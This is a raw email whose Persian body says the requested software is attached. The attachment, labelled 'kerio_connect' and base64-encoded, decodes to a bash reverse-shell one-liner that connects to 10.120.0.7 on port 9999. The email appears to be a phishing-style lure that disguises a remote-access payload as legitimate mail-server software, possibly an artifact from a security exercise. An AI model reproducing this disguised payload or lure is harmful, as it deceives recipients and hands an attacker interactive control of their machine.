Return-Path: moradi@petromaz.ir
Received: from mail.petromaz.ir (LHLO mail.petromaz.ir) (10.3.153.2) by
 mail.petromaz.ir with LMTP; Tue, 12 Mar 2024 05:43:14 +0000 (UTC)
Received: from [127.0.0.1] (localhost [127.0.0.1])
	by mail.petromaz.ir (Postfix) with ESMTPSA id 935835E4DB0
	for <savad-koohi@petromaz.ir>; Wed,  6 Mar 2024 20:09:34 +0000 (UTC)
Content-Type: multipart/mixed; boundary="===============8755057747900005484=="
MIME-Version: 1.0
From: moradi@petromaz.ir
To: savad-koohi@petromaz.ir
Subject: software
Message-Id: <20240306200934.935835E4DB0@mail.petromaz.ir>
Date: Wed,  6 Mar 2024 20:09:34 +0000 (UTC)

--===============8755057747900005484==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: base64

2LPZhNin2YUK2YbYsdmFINin2YHYstin2LEg2K/Ysdiu2YjYp9iz2Kog2LTYr9mHINix2Kcg2b7b
jNmI2LPYqiDaqdix2K/ZhS4K

--===============8755057747900005484==
Content-Type: application/octet-stream; Name="email3/kerio_connect"
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="email3/kerio_connect"

bHM7L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEyMC4wLjcvOTk5OSAwPiYxOw==

--===============8755057747900005484==--
